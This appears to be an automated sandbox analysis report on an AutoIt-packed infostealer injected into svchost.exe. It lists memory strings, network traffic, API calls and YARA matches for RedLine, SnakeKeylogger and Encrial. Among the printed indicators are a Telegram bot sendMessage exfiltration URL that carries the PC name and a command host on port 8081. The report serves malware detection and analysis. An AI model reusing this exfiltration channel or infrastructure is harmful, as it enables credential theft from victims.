Source: svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608426145.0000000007B1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: svchost.exe, 00000002.00000002.3934335927.00000000054AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: svchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enl
Source: svchost.exe, 00000002.00000002.3934335927.00000000054B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: svchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: svchost.exe, 00000002.00000002.3934335927.00000000053B8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: svchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/H
Source: svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/l
Source: svchost.exe, 00000002.00000002.3934335927.00000000054E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49723 version: TLS 1.2

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00674164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00674164

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00674164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00674164

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00673F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00673F66

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0066001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0066001C

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0068CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0068CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.lsc5QN46NH.exe.21a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00603B3A
Source: lsc5QN46NH.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: lsc5QN46NH.exe, 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_52c4e1c3-8
Source: lsc5QN46NH.exe, 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_afb52e6f-6
Source: lsc5QN46NH.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b9a4a06c-9
Source: lsc5QN46NH.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_52f5e33c-e

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0066A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0066A1EF

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00658310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00658310

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006651BD

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0060E6A0	0_2_0060E6A0
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0062D975	0_2_0062D975
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0060FCE0	0_2_0060FCE0
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006221C5	0_2_006221C5
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006362D2	0_2_006362D2
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006803DA	0_2_006803DA
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0063242E	0_2_0063242E
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006225FA	0_2_006225FA
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0065E616	0_2_0065E616
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006166E1	0_2_006166E1
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0063878F	0_2_0063878F
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00636844	0_2_00636844
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00680857	0_2_00680857
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00618808	0_2_00618808
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00668889	0_2_00668889
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0062CB21	0_2_0062CB21
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00636DB6	0_2_00636DB6
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00616F9E	0_2_00616F9E
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00613030	0_2_00613030
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0062F1D9	0_2_0062F1D9
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00623187	0_2_00623187
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00601287	0_2_00601287
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00621484	0_2_00621484
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00615520	0_2_00615520
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00627696	0_2_00627696
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00615760	0_2_00615760
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00621978	0_2_00621978
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00639AB5	0_2_00639AB5
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00687DDB	0_2_00687DDB
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0062BDA6	0_2_0062BDA6
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00621D90	0_2_00621D90
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0060DF00	0_2_0060DF00
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00613FE0	0_2_00613FE0
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_01645370	0_2_01645370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786D7BF	2_2_0786D7BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786C6B3	2_2_0786C6B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07867630	2_2_07867630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786D4EB	2_2_0786D4EB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786431B	2_2_0786431B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786D213	2_2_0786D213
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07862F8B	2_2_07862F8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786CF3B	2_2_0786CF3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07866EA8	2_2_07866EA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786EEE0	2_2_0786EEE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786CC5F	2_2_0786CC5F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786C987	2_2_0786C987
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07865887	2_2_07865887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786EED0	2_2_0786EED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786FBA8	2_2_0786FBA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09049578	2_2_09049578
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09042580	2_2_09042580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09045048	2_2_09045048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09049C48	2_2_09049C48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09040B30	2_2_09040B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_090417B0	2_2_090417B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09041E98	2_2_09041E98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904D119	2_2_0904D119
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904D128	2_2_0904D128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904D570	2_2_0904D570
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09042572	2_2_09042572
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904D580	2_2_0904D580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904D9C8	2_2_0904D9C8
